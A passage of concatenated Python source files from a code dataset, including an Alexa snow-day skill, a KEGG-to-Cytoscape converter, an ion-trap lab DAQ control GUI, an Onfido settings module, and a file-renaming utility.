Assistnat\"\n speech_output = \"Thank you for using Snow Day Assistant. \"\n # Setting this to true ends the session and exits the skill.\n should_end_session = True\n return build_response({}, build_speechlet_response(\n card_title, speech_output, None, should_end_session))\n\n\ndef get_chances_of_school(intent, session):\n \"\"\" Sets the color in the session and prepares the speech to reply to the\n user.\n \"\"\"\n card_title = \"Chances of school\"\n session_attributes = {}\n should_end_session = True\n\n latlong = get_latlong()\n snowAccumulation = get_snow_accumulation(latlong)\n if snowAccumulation < 75:\n likelyToClose = \"likely\"\n elif snowAccumulation < 125:\n likelyToClose = \"unlikely\"\n else:\n likelyToClose = \"very unlikely\"\n speech_output = \"Chances of school tomorrow are \" + likelyToClose\n reprompt_text = \"You can ask for the likelyhood of a snowday in by saying, \" \\\n \"Snow Day Assistant, what are the chances of school tomorrow?\"\n return build_response(session_attributes, build_speechlet_response(\n card_title, speech_output, reprompt_text, should_end_session))\n\n\ndef get_snow_accumulation(latlong):\n snowAccumulation = 0\n\n response = urllib2.urlopen(\"https://earthnetworks.azure-api.net/data/forecasts/v1/daily?location=\" + latlong +\n \"&locationtype=latitudelongitude&units=english&cultureinfo=en-en&verbose=true&subscription-key=########################\").read()\n parsed_json = json.loads(response)\n forecasts = parsed_json['dailyForecastPeriods']\n for dayForecast in forecasts:\n today = datetime.strptime(\n dayForecast['forecastDateUtcStr'], \"%Y-%m-%dT%H:%M:%SZ\")\n today = today.strftime(\"%Y-%m-%d\")\n tomorrow = datetime.strptime(\n str(datetime.utcnow() + timedelta(days=1)), \"%Y-%m-%d %H:%M:%S.%f\")\n tomorrow = tomorrow.strftime(\"%Y-%m-%d\")\n if today == tomorrow:\n snowAccumulation += dayForecast['snowAmountMm']\n\n return snowAccumulation\n\n\ndef get_latlong():\n response = urllib2.urlopen(\"http://freegeoip.net/json/\").read()\n parsed_json = json.loads(response)\n latlong = str(parsed_json['latitude']) + \",\" + str(parsed_json['longitude'])\n return latlong\n\n\ndef build_speechlet_response(title, output, reprompt_text, should_end_session):\n return {\n 'outputSpeech': {\n 'type': 'PlainText',\n 'text': output\n },\n 'card': {\n 'type': 'Simple',\n 'title': title,\n 'content': output\n },\n 'reprompt': {\n 'outputSpeech': {\n 'type': 'PlainText',\n 'text': reprompt_text\n }\n },\n 'shouldEndSession': should_end_session\n }\n\n\ndef build_response(session_attributes, speechlet_response):\n return {\n 'version': '1.0',\n 'sessionAttributes': session_attributes,\n 'response': speechlet_response\n }\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5154,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"202974010","text":"# -*- coding: utf-8 -*-\n\nimport click\n\nimport requests\nfrom bs4 import BeautifulSoup\n\nimport json\n\n@click.command()\n@click.argument('kgmlid')\ndef main(kgmlid):\n \"\"\"Console script for kgml2cyjs\"\"\"\n click.echo(\"Replace this message by putting your code into \"\n \"kgml2cyjs.cli.main\")\n click.echo(\"See click documentation at http://click.pocoo.org/\")\n kgml = requests.get('http://rest.kegg.jp/get/' + kgmlid + '/kgml').content\n soup = BeautifulSoup(kgml, \"xml\")\n # print(len(soup.find_all('entry')))\n # print(len(soup.find_all('relation')))\n # f = open(kgmlid + '.xml', 'wb')\n # f.write(kgml)\n # f.close()\n\n d = {\n \"format_version\": \"1.0\",\n \"generated_by\": \"cytoscape-3.5.0\",\n \"target_cytoscapejs_version\": \"~2.1\",\n \"data\": {\n \"shared_name\": \"Network\",\n \"name\": \"Network\",\n \"SUID\": 337,\n \"__Annotations\": [],\n \"selected\": \"true\"\n },\n }\n\n elements = {}\n nodes = []\n\n entries = soup.find_all('entry')\n\n for i, e in enumerate(entries):\n # print(e[\"id\"])\n data = {}\n data[\"id\"] = e[\"id\"]\n data[\"shared_name\"] = e[\"name\"]\n data[\"name\"] = e[\"name\"]\n data[\"SUID\"] = int(e[\"id\"])\n data[\"selected\"] = \"false\"\n tmp = {\"data\" : data, \"position\" : {\"x\" : int(e.graphics[\"x\"]), \"y\" : int(e.graphics[\"y\"])}, \"selected\" : \"false\"}\n nodes.append(tmp)\n\n elements[\"nodes\"] = nodes\n elements[\"edges\"] = []\n d[\"elements\"] = elements\n # print(json.dumps(d))\n with open(kgmlid + '.cyjs', 'w') as outfile:\n json.dump(d, outfile, indent=2)\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"kgml2cyjs/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":1688,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"463351210","text":"\nfrom PIL import Image\nimport numpy as np\nimport cv2\nfrom enum import Enum\nclass State(Enum):\n simulate=\"0\"\n newdata=\"1\"\n action=\"2\"\n reset=\"100\"\n done_reset=\"102\"\n def __str__(self):\n return str(self.value)\ndef check_state():\n f=open(\"state.txt\")\n tmp=f.read() \n if tmp!='':\n return int(tmp)\n f.close()\n\n \ndef change_state(newstate):\n try:\n f=open(\"state.txt\",'w')\n f.write(newstate)\n f.close()\n except:\n pass\n\nchange_state(\"0\")\niterations=0\nwhile iterations<50: # zrobilem to dla przykladu, zrobic 50 klatek potem zresetowac\n\n if (check_state()==1) : \n f= open(\"ultrasound.txt\")\n ultrasound=f.read()\n f.close()\n f= open(\"lidar.txt\")\n lidar=f.read()\n f.close()\n \n f=open(\"actions.txt\",'w')\n f.write(\"1.0\\n-1.0\") # lewy silnik 1, prawy -1 => obrot w lewo, 1 1 => do przodu , -1 1 do tylu\n f.close()\n change_state(\"2\")\n iterations+=1\n print(iterations)\n\nprint(\"reset\")\nchange_state(\"100\")#zresetowac\n#czekamy az sie zresetuje\nwhile True:\n if check_state()==102:\n print(\"done reseting simulation\") #lodz znajduje sie na poczatku levela\n break\n\n\n \n\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"57971871","text":"'''\n\nBoris Blinov Lab - Department of Physics, University of Washington, Seattle, WA 98105, USA\n\nOriginally written by Alex Kato\nModified by Raymond Lee\n\nThis python script allows the user to control the DAQ instrument through a window. \nCurrent capabilities include reading PMT data, change settings, turning lasers on/off, and controling voltage output level. \n\n'''\n\n#### import needed packages ####\nimport nidaqmx as ni \nimport numpy as np \nfrom nidaqmx import constants\nfrom nidaqmx.stream_readers import CounterReader\nfrom nidaqmx import stream_writers\n\n#### customised versions for the lab\nfrom spinmob import egg\nimport pyqtgraph as pyqt \n\n#### constant initialisations #### needs to be moved to a separate file soon\nPMT_COUNTS_HOLD = np.zeros(500)\nPMT_COUNTS_RAW = np.zeros(500)\nPMT_COUNTS_AVERAGE = np.zeros(500)\nPMT_COUNTS_AVERAGE_HOLD = np.zeros(500)\nCOUNT_READ = np.zeros(2, dtype = np.uint32)\nCOUNT_HOLD = 0\nCOUNT_HOLD_AVERAGE = 0\n\n#### NI constant initialisation #### needs to be moved to a separate file soon\nSECONDS = ni.constants.TimeUnits.SECONDS\nLOW = ni.constants.Level.LOW\nHIGH = ni.constants.Level.HIGH\nsize = constants.READ_ALL_AVAILABLE\n\n#### Analog Output Tasks ####\ndef send_voltage(voltage_size):\n VOLTS = ni.constants.VoltageUnits.VOLTS\n AO0 = ni.Task()\n AO0.ao_channels.add_ao_voltage_chan(\"Dev1/ao0\", \"ao0 level\", -10, 10, units = VOLTS)\n AO0.start()\n \n global AO0_OUT\n AO0_OUT = ni.stream_writers.AnalogSingleChannelWriter(AO0.out_stream)\n AO0_OUT.write_one_sample(voltage_size)\n voltage_lbl.setText(str(voltage_size))\n \n AO0.close()\n \n#### Digital Out Tasks 0 ####\ndef initialise_DO0():\n global DO0\n global DO0_OUT\n\n DO0 = ni.Task()\n DO0.do_channels.add_do_chan(\"Dev1/port0/line0\", \"DO0_Laser\", constants.LineGrouping.CHAN_PER_LINE)\n\n DO0.start()\n\n print(\"P0.0 initialised as Digital Output\")\n\ndef set_DO0_high():\n global DO0\n DO0.write(True)\n print(\"P0.0 set to 5V\")\n\ndef set_DO0_low():\n global DO0\n DO0.write(False)\n print(\"P0.0 set to 0V\")\n\ndef close_DO0():\n global DO0\n DO0.close()\n\n#### Digital Out Task 1 ####\ndef initialise_DO1():\n global DO1\n\n DO1 = ni.Task()\n DO1.do_channels.add_do_chan(\"Dev1/port0/line1\", \"DO1_Laser\", constants.LineGrouping.CHAN_PER_LINE)\n\n DO1.start()\n\n print(\"P0.1 initialised as Digital Output\")\n\ndef set_DO1_high():\n global DO1\n DO1.write(True)\n print(\"P0.1 set to 5V\")\n\ndef set_DO1_low():\n global DO1\n DO1.write(False)\n print(\"P0.1 set to 0V\")\n\ndef close_DO1():\n global DO1\n DO1.close()\n\n#### initialising PMT and exposure time set in ms ####\ndef initialise_PMT(exposure = 20):\n global A\n global PMT_COUNT\n global TIMER1\n global COUNT_READ\n global PMT_COUNTS_RAW\n global PMT_COUNTS_HOLD\n\n RATE = (exposure*1e-3)**-1\n PMT_COUNT = ni.Task()\n TIMER1 = ni.Task()\n\n ## creates an output channel to be used as an internal timer ##\n TIMER1.co_channels.add_co_pulse_chan_freq(\"Dev1/ctr1\", \"PMT_TIMING\", freq = RATE)\n\n TIMER1.timing.cfg_implicit_timing(sample_mode = constants.AcquisitionType.CONTINUOUS)\n \n PMT_COUNT.ci_channels.add_ci_count_edges_chan(\"Dev1/ctr0\", \"PMT_COUNTING\", initial_count = 0)\n PMT_COUNT.timing.cfg_samp_clk_timing(rate = RATE, source = \"/Dev1/Ctr1InternalOutput\", sample_mode = ni.constants.AcquisitionType.CONTINUOUS)\n A = CounterReader(PMT_COUNT.in_stream)\n TIMER1.start()\n PMT_COUNT.start()\n\ndef close_PMT():\n PMT_COUNT.close()\n TIMER1.close()\n\ndef settings_changed(*a):\n settings.save()\n\n#### functions for digital logic on/off for P0.0 ####\ndef onoff_DO0(*a):\n if settings[\"settings/Bean_Status/493_nm\"] == \"ON\" and DO0.read() == True:\n set_DO0_low()\n print(\"493 is OFF\")\n settings[\"settings/Bean_Status/493_nm\"] = \"OFF\"\n\n elif settings[\"settings/Beam_Status/493_nm\"] == \"OFF\" and DO0.read() == False:\n set_DO0_high()\n print(\"493 is ON\")\n settings[\"settings/Beam_Status/493_nm\"] = \"ON\"\n\n else:\n print(\"Error, 493 beam defaulted to OFF\")\n set_DO0_low()\n settings[\"settings/Beam_Status/493_nm\"] = \"OFF\"\n DO0_OnOff.set_checked(value = False)\n\ndef onoff_DO1(*a):\n if settings[\"settings/Beam_Status/650_nm\"] == \"ON\" and DO1.read() == True:\n set_DO1_low()\n print(\"650 is OFF\")\n settings[\"settings/Beam_Status/650_nm\"] = \"OFF\"\n\n elif settings[\"settings/Beam_Status/650_nm\"] == \"OFF\" and DO1.read() == False:\n set_DO1_high()\n print(\"650 is ON\")\n settings[\"settings/Beam_Status/650_nm\"] = \"ON\"\n\n else:\n print(\"Error, 650 beam defaulted to OFF\")\n set_DO1_low()\n settings[\"settings/Beam_Status/650_nm\"] = \"OFF\"\n DO1_OnOff.set_checked(value = False)\n\n#### data taking functions ####\ndef EXP_AV(X, Y):\n alpha = 0.5\n LEN = len(X)\n Z = np.zeros(LEN)\n Z[0: -1] = X[1:]\n SUM = 0\n for i in range(0, LEN):\n SUM += (1-alpha)**(LEN + 1 - i)*X[i]\n Z[-1] = alpha*(Y + SUM)\n return Z\n\ndef smooth(y, box_pts):\n box = np.ones(box_pts) / box_pts\n y_smooth = np.convolve(y, box, mode='same')\n return y_smooth\n\ndef ACQUIRE_PMT():\n global PMT_COUNTS_HOLD\n global PMT_COUNTS_RAW\n global COUNT_HOLD\n global COUNT_READ\n global A\n global PMT_COUNTS_AVERAGE\n global PMT_COUNTS_AVERAGE_HOLD\n\n try:\n A.read_many_sample_uint32(COUNT_READ, number_of_samples_per_channel = 2)\n new_val = np.average(COUNT_READ) - COUNT_HOLD\n PMT_COUNTS_RAW = EXP_AV(PMT_COUNTS_RAW, new_val)\n PMT_COUNTS_AVERAGE = smooth(PMT_COUNTS_RAW, 4)\n PMT_AVERAGE_DISPLAY = PMT_COUNTS_AVERAGE[1: len(PMT_COUNTS_AVERAGE) - 1]\n\n COUNT_HOLD = np.average(COUNT_READ)\n \n except:\n print(\"ERROR: Invalid source script.\")\n close_PMT()\n COUNT_HOLD=0\n initialise_PMT(settings[\"settings/Acquisition Settings/exposure\"])\n\n return PMT_AVERAGE_DISPLAY\n\n#### function for when the acquire button is pressed ####\ndef acquire_button_clicked(*a):\n global COUNT_HOLD\n\n if not PMT_ACQUIRE_BUTTON.is_checked():\n return\n \n close_PMT()\n num_box.set_value(0)\n print(\"Starting acuisition loop... \")\n\n initialise_PMT(settings[\"settings/Acquisition Settings/exposure\"])\n\n while PMT_ACQUIRE_BUTTON.is_checked() and (num_box.get_value() < settings[\"settings/Acquisition Settings/iterations\"] or settings[\"settings/Acquisition Settings/iterations\"] == 0):\n\n databox1.clear()\n databox2.clear()\n\n settings.send_to_databox_header(databox1)\n settings.send_to_databox_header(databox2)\n\n databox1['t'] = np.linspace(0, settings[\"settings/simulated_input/points\"]*(settings[\"settings/Acquisition Settings/exposure\"]), settings[\"settings/simulated_input/points\"])\n databox1[0] = ACQUIRE_PMT()\n current_count.setText(str(np.round(databox1[0][-1])))\n\n num_box.increment()\n\n databox1.plot(); databox1.autosave()\n databox2.plot(); databox2.autosave()\n\n win.process_events()\n \n PMT_ACQUIRE_BUTTON.set_checked(False)\n print(\"Acquisition stopped\")\n COUNT_HOLD = 0\n close_PMT()\n\ndef CLEAR_PMT_DATA():\n PMT_COUNT_RAW = np.zeros(500)\n PMT_COUNTS_AVERAGE = np.zeros(500)\n\n#### GUI section #####\n\"\"\" creating the main window \"\"\"\nwin = egg.gui.Window(autosettings_path = 'NIDAQTESTING.cfg')\n\n\"\"\" left side of the main window \"\"\"\nPMT_ACQUIRE_BUTTON = win.place_object(egg.gui.Button(\"Count Photons\", checkable = True)).set_width(135)\nnum_box = win.place_object(egg.gui.NumberBox(int = True)).set_width(50)\n\ntabs = win.place_object(egg.gui.TabArea(), row_span = 2, alignment = 0)\n\ncurrent_count = pyqt.QtGui.QLabel(\"No Data\")\nwin.place_object(current_count).setFont(egg.pyqtgraph.QtGui.QFont(\"Times Roman\"))\n\nwin.place_object(current_count, row = 3, column = 2)\n\nwin.new_autorow()\nsettings = win.place_object(egg.gui.TreeDictionary('NIDAQTESTINGSETTINGS.cfg'), column_span = 2)\n\nwin.new_autorow()\nDO0_OnOff = win.place_object(egg.gui.Button(\"493 On/Off\", checkable = True)).set_width(120)\nDO1_OnOff = win.place_object(egg.gui.Button(\"650 On/Off\", checkable = True)).set_width(120)\n\nsettings.add_parameter(\"settings/Acquisition Settings/iterations\", value = 0, type = 'int')\nsettings.add_parameter(\"settings/ simulated_input/channels\", value = 1, type = 'int', limits = (1, 8))\nsettings.add_parameter(\"settings/Acquisition Settings/exposure\", value = 20, type = 'float', limits = (0.001, None), dec = True, siPrefix = True, suffix = 'ms')\nsettings.add_parameter(\"settings/simulated_input/points\", value = 500, type = 'int', limits = (2, None))\nsettings.add_parameter(\"settings/simulated_input/Averaging\", value = 2, type = 'int', limits = (1, 200))\nsettings.add_parameter(\"settings/Beam_Status/493_nm\", value = \"OFF\", type = 'list', values = [\"ON\", \"OFF\"])\nsettings.add_parameter(\"settings/Beam_Status/650_nm\", value = \"OFF\", type = 'list', values = [\"ON\", \"OFF\"])\n\n\"\"\" tab 1 GUI \"\"\"\ntab1 = tabs.add_tab(\"PMT Signal\")\ndatabox1 = tab1.place_object(egg.gui.DataboxPlot(autosettings_path = 'NIDAQTESTp1.cfg'), alignment = 0)\n\n\"\"\" tab 2 GUI \"\"\"\ntab2 = tabs.add_tab(\"Analysis\")\ndatabox2 = tab2.place_object(egg.gui.DataboxPlot(autosettings_path = 'NIDAQTESTp2.cfg'), alignment = 0)\n\n\"\"\" tab 3 GUI \"\"\"\ntab3 = tabs.add_tab(\"Voltage Output\")\nbtn_reset = tab3.place_object(egg.gui.Button(\"RESET\", checkable = False)).set_width(50)\nbtn1v = tab3.place_object(egg.gui.Button(\"1V\", checkable = False)).set_width(50)\nbtn2v = tab3.place_object(egg.gui.Button(\"2V\", checkable = False)).set_width(50)\nbtn3v = tab3.place_object(egg.gui.Button(\"3V\", checkable = False)).set_width(50)\nbtn5v = tab3.place_object(egg.gui.Button(\"5V\", checkable = False)).set_width(50)\nvoltage_box = tab3.place_object(egg.gui.NumberBox(float = True)).set_width(50)\nvoltage_btn = tab3.place_object(egg.gui.Button(\"PIKA PIKA!\", checkable = False)).set_width(100)\nvoltage_lbl = tab3.place_object(pyqt.QtGui.QLabel(\"zéro.zéro at the moment...\"))\n\nsettings.load()\ninitialise_PMT(settings[\"settings/Acquisition Settings/exposure\"])\ninitialise_DO0()\ninitialise_DO1()\n\nset_DO0_low()\nset_DO1_low()\n\nsettings[\"settings/Beam_Status/493_nm\"] = \"OFF\"\nsettings[\"settings/Beam_Status/650_nm\"] = \"OFF\"\n\nbtn_reset.signal_clicked.connect(lambda: send_voltage(0))\nbtn1v.signal_clicked.connect(lambda: send_voltage(1.0))\nbtn2v.signal_clicked.connect(lambda: send_voltage(2.0))\nbtn3v.signal_clicked.connect(lambda: send_voltage(3.0))\nbtn5v.signal_clicked.connect(lambda: send_voltage(5.0))\nvoltage_btn.signal_clicked.connect(lambda: send_voltage(voltage_box.get_value()))\n\nPMT_ACQUIRE_BUTTON.signal_clicked.connect(acquire_button_clicked)\nDO0_OnOff.signal_clicked.connect(onoff_DO0)\nDO1_OnOff.signal_clicked.connect(onoff_DO1)\n\nsettings.connect_any_signal_changed(settings_changed)\n\ndef shutdown():\n print(\"Closing but not destorying...\")\n PMT_ACQUIRE_BUTTON.set_checked(False)\n close_DO0()\n close_DO1()\n close_PMT\n return\n\nwin.event_close = shutdown\n\nwin.show(True)\n","sub_path":"ion-trap-scrippy-v2.py","file_name":"ion-trap-scrippy-v2.py","file_ext":"py","file_size_in_byte":11024,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"551667468","text":"# -*- coding: utf-8 -*-\r\nimport requests\r\nimport traceback\r\nfrom datetime import datetime\r\n\r\n \r\ndef crossTaskUpload(serverIP, action, values):\r\n try:\r\n turl = \"http://%s:8080/ba/%s\"%(serverIP, action)\r\n #values = {'comments': comments}\r\n msgSession = requests.Session()\r\n r = msgSession.post(turl, data=values)\r\n print(r.text)\r\n except Exception as e:\r\n tstr = traceback.format_exc()\r\n print(tstr)\r\n\r\ndef crossTaskUploadTest():\r\n serverIP = '127.0.0.1'\r\n #acton = 'addWeather.action'\r\n #values={'siteId':1,'timeUtc':datetime.now(),'weather':'clear','temperature':0,'humidity':0,'cloudRatio':0,'windSpeed':0,'rainfall':0}\r\n action = 'addInstrumentObservationHistory.action'\r\n istId, skyId, obsStartTime, obsDuring, obsCtrRa, obsCtrDec, obsRadius, obsLfTpRa, obsLfTpDec, obsRtTpRa, obsRtTpDec, obsRtBmRa, obsRtBmDec, obsLfBmRa, obsLfBmDec = [0,0,0,0,0,0,0,0,0,0,0,0,0,0,0][:]\r\n values = {'istId':istId, 'skyId':skyId, 'obsStartTime':obsStartTime, 'obsDuring':obsDuring, 'obsCtrRa':obsCtrRa, 'obsCtrDec':obsCtrDec, 'obsRadius':obsRadius, 'obsLfTpRa':obsLfTpRa, 'obsLfTpDec':obsLfTpDec, 'obsRtTpRa':obsRtTpRa, 'obsRtTpDec':obsRtTpDec, 'obsRtBmRa':obsRtBmRa, 'obsRtBmDec':obsRtBmDec, 'obsLfBmRa':obsLfBmRa, 'obsLfBmDec':obsLfBmDec}\r\n crossTaskUpload(serverIP, action, values)\r\n\r\n \r\nif __name__ == \"__main__\":\r\n \r\n crossTaskUploadTest()","sub_path":"src/main/python/ValuesUpload.py","file_name":"ValuesUpload.py","file_ext":"py","file_size_in_byte":1426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"539334758","text":"'''\nInput:\ngas = [1,2,3,4,5]\ncost = [3,4,5,1,2]\nOutput: 3\n-2, -2, -2, 3, 3\n-2, -4, -6, -3 0\n'''\nclass Solution:\n def canCompleteCircuit(self, gas, cost):\n if sum(gas) < sum(cost):\n return -1\n\n diffs = [g - c for g, c in zip(gas, cost)]\n idx = None\n balance = 0\n for i, diff in enumerate(diffs):\n if balance > 0:\n balance = balance + diff\n else:\n balance = diff\n idx = i\n\n return idx","sub_path":"leetcode/py/134.py","file_name":"134.py","file_ext":"py","file_size_in_byte":506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"494452752","text":"# -*- coding: utf-8 -*-\n\"\"\"onfido settings.\"\"\"\nfrom os import getenv\n\nfrom django.conf import settings\n\n# the API HTTP root url\nAPI_ROOT = \"https://api.onfido.com/v2/\"\n\n# API key from evnironment by default\nAPI_KEY = (\n getenv('ONFIDO_API_KEY', None) or\n getattr(settings, 'ONFIDO_API_KEY', None)\n)\n\n# Webhook token - see https://documentation.onfido.com/#webhooks\nWEBHOOK_TOKEN = (\n getenv('ONFIDO_WEBHOOK_TOKEN', None) or\n getattr(settings, 'ONFIDO_WEBHOOK_TOKEN', None)\n)\n\n# Set to False to turn off event logging\nLOG_EVENTS = getattr(settings, 'ONFIDO_LOG_EVENTS', True)\n\n# Set to True to bypass request verification (NOT RECOMMENDED)\nTEST_MODE = getattr(settings, 'ONFIDO_TEST_MODE', False)\n\n\ndef DEFAULT_REPORT_SCRUBBER(raw):\n \"\"\"Default report scrubber, removes breakdown and properties.\"\"\"\n try:\n del raw['breakdown']\n del raw['properties']\n except KeyError:\n pass\n return raw\n\n# function used to scrub sensitive data from reports\nscrub_report_data = (\n getattr(settings, 'ONFIDO_REPORT_SCRUBBER', None) or\n DEFAULT_REPORT_SCRUBBER\n)\n","sub_path":"onfido/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":1093,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"615997511","text":"# coding:utf-8\r\n# 验证json字符串不能表达二进制数据\r\n# TypeError: Object of type 'bytes' is not JSON serializable\r\n\r\nimport json\r\nimport chardet\r\nwith open('equal_test.py', 'rb') as f:\r\n data = f.read()\r\n\r\nprint(type(data))\r\nprint(chardet.detect(data))\r\n\r\n# a = {'bool': True, 'int': 1, 'bin': data}\r\n# TypeError: Object of type 'bytes' is not JSON serializable\r\n\r\na = {'bool': True, 'int': 1, 'bin': data.decode('gbk')}\r\njstr = json.dumps(a, indent=2)\r\nprint(jstr)\r\n\r\njdata = json.loads(jstr)\r\nprint(jdata)\r\n\r\n","sub_path":"messy/python_basic/基本数据结构/json_test/二进制.py","file_name":"二进制.py","file_ext":"py","file_size_in_byte":527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"99773466","text":"#!/usr/bin python2.7\n#-*- coding: utf-8 -*-\nimport os\nimport time\n\n# Le script doit être placé dans le dossier dans lequel la syntaxe des fichiers\n# et dossiers doivent être modifiés.\nmain_path = os.path.dirname(os.path.abspath(__file__))\n\ndef folder_to_edit():\n print(\"==========\\nThe current script will run on '\"+ main_path\n +\"'.\\n==========\")\n\ndef syntaxing():\n\n # On instance plusieurs variables afin de donner du contrôle à l'utilisateur\n edit_check = 0\n check_dir_to_edit = 0\n check_files_to_edit = 0\n edit_count = 0\n\n for root, dirs, files in os.walk(main_path, topdown=False):\n for name in dirs:\n all_dir = os.path.join(root, name)\n all_dir_new = os.path.join(root, name.replace(' - ', '_').replace(' ',\n '_').replace('-', '_').replace('é', 'e').lower())\n if all_dir != all_dir_new:\n while check_dir_to_edit < 1:\n print(\"\\nDirectories below will be edited : \\n\")\n check_dir_to_edit=2\n print(all_dir + \" ==> \" + all_dir_new)\n edit_check += 1\n\n for root, dirs, files in os.walk(main_path, topdown=False):\n for name in files:\n all_files = os.path.join(root, name)\n all_files_new = os.path.join(root, name.replace('_-_','_').replace(' - ', '_').replace(' ',\n '_').replace('-', '_').replace('é', 'e').lower())\n if all_files != all_files_new:\n while check_files_to_edit < 1:\n print (\"\\nFiles below will be edited : \\n\")\n check_files_to_edit = 2\n print(all_files + \" ==> \" + all_files_new)\n edit_check += 1\n\n if edit_check == 0:\n print(\"\\nSyntaxing is correct.\\nProgramm exit.\")\n exit()\n else:\n response = str(input(\"\\nContinue (y/n) \"\n \":\"))\n wainting_user_response =0\n while wainting_user_response < 1:\n if response == \"y\" or response == 'Y':\n start_time = time.time()\n for root, dirs, files in os.walk(main_path, topdown=False):\n for name in dirs:\n all_dir = os.path.join(root, name)\n all_dir_new = os.path.join(root,\n name.replace('_-_','_').replace(' - ', '_').replace(' ',\n '_').replace('-', '_').replace('é', 'e').lower())\n if all_dir != all_dir_new:\n os.rename(all_dir, all_dir_new)\n edit_count += 1\n for name in files:\n all_files = os.path.join(root, name)\n all_files_new = os.path.join(root, name.replace('_-_','_').replace(' - ',\n '_').replace(' ',\n '_').replace('-', '_').replace('é', 'e').lower())\n if all_files != all_files_new:\n os.rename(all_files, all_files_new)\n edit_count += 1\n\n print(\n str(edit_count) + \" files or directories has \"\n \"been edited with linux \"\n \"syntaxing.\")\n\n print(\"--- Executed in %s seconds ---\\n Programm exit.\" % (time.time() -\n start_time))\n wainting_user_response += 1\n\n elif response == 'n' or response == 'N':\n print('Programm exit')\n exit()\n\n elif response is None or response not in ['Y', 'y', 'N', 'n'] :\n response = str(input(\"Please enter a valid option choice (\"\n \"y/n) :\"))\n else:\n print('Programm exit')\n exit()\n\n\nif __name__ == \"__main__\":\n folder_to_edit()\n syntaxing()\n","sub_path":"linux_syntax.py","file_name":"linux_syntax.py","file_ext":"py","file_size_in_byte":4163,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"405556199","text":"from mock import Mock\n\nfrom cardinal.bot import (\n CardinalBot,\n user_info,\n)\n\nfrom . import game\nfrom .plugin import CAHPlugin\n\n\nclass TestPlugin:\n def setup_method(self):\n self.channel = '#cah'\n self.player = 'player1'\n self.user = user_info(self.player, 'user', 'vhost')\n\n self.mock_cardinal = Mock(spec=CardinalBot)\n self.mock_cardinal.nickname = 'Cardinal'\n\n self.plugin = CAHPlugin(self.mock_cardinal,\n {'channel': self.channel})\n\n self.plugin.game = game.Game()\n self.plugin.game.add_player(self.player)\n\n def test_play_wrong_channel(self):\n channel = '#invalid-channel'\n self.plugin.ready(self.mock_cardinal,\n self.user,\n channel,\n '.play')\n\n self.mock_cardinal.sendMsg.assert_called_once_with(\n channel,\n \"Please start the game in {}!\".format(self.channel))\n\n def test_choose_waiting_in_pm(self):\n # when command sent in pm, respond in pm\n self.plugin.choose(self.mock_cardinal,\n self.user,\n self.player,\n \".choose 1\")\n\n self.mock_cardinal.sendMsg.assert_called_once_with(\n self.player,\n \"Please wait for your turn.\",\n )\n\n def test_choose_waiting_in_channel(self):\n # went command sent in channel, respond in channel\n self.plugin.choose(self.mock_cardinal,\n self.user,\n self.channel,\n \".choose 1\")\n\n self.mock_cardinal.sendMsg.assert_called_once_with(\n self.channel,\n \"Please wait for your turn.\",\n )\n","sub_path":"test_plugin.py","file_name":"test_plugin.py","file_ext":"py","file_size_in_byte":1789,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"16844629","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nExtract the features of the triangles and train the model.\r\n\"\"\"\r\n\r\nfrom tkinter.filedialog import askopenfilenames\r\nimport matplotlib.pyplot as plt\r\nfrom tqdm import tqdm\r\nimport re\r\nimport pickle\r\nimport numpy as np\r\nimport pandas as pd\r\nimport math\r\nfrom scipy import stats\r\nimport seaborn as sns\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.preprocessing import StandardScaler\r\nfrom sklearn.svm import SVC\r\nfrom sklearn.metrics import classification_report, confusion_matrix\r\nfrom sklearn.model_selection import GridSearchCV\r\nfrom matplotlib import colors\r\n\r\n\r\ndef find_polar_r(dataframe):\r\n \"\"\"\r\n Transform into polar, find r.\r\n\r\n Parameters\r\n ----------\r\n dataframe : pandas.dataframe\r\n Dataframe of 1 rat.\r\n\r\n Returns\r\n -------\r\n dataframe : pandas.dataframe\r\n the same dataframe with the calculated r values appended.\r\n\r\n \"\"\"\r\n dataframe['r'] = dataframe.apply(lambda x: math.hypot(x.u,x.v), axis=1)\r\n return dataframe\r\n\r\n\r\ndef find_polar_phi(dataframe):\r\n \"\"\"\r\n Transform into polar, find angle.\r\n\r\n Parameters\r\n ----------\r\n dataframe : pandas.dataframe\r\n Dataframe of 1 rat.\r\n\r\n Returns\r\n -------\r\n dataframe : pandas.dataframe\r\n the same dataframe with the calculated angle values appended.\r\n\r\n \"\"\"\r\n dataframe['phi'] = dataframe.apply(lambda x: math.atan2(x.v, x.u), axis=1) # !!! v and u in unusual order\r\n return dataframe\r\n\r\n\r\ndef load_optimal_values():\r\n \"\"\"\r\n Load the optimal values found for each recording.\r\n Open dialog window and select the files.\r\n\r\n Returns\r\n -------\r\n Files_Dict : Dictionary\r\n Dictionary assigning the optimal values to the recordings.\r\n\r\n \"\"\"\r\n temp = askopenfilenames()\r\n file_names = list(temp)\r\n Files_Dict = {42: {0: {}, 1: {}, 2: {}},\r\n 52: {0: {}, 1: {}, 2: {}},\r\n 74: {0: {}, 1: {}, 2: {}, 3: {}},\r\n 146: {0: {}, 1: {}, 2: {}, 3: {}}}\r\n for filename in tqdm(file_names):\r\n ID_rat = re.search(r\"id_(\\d+)_\", filename).group(1)\r\n alt = 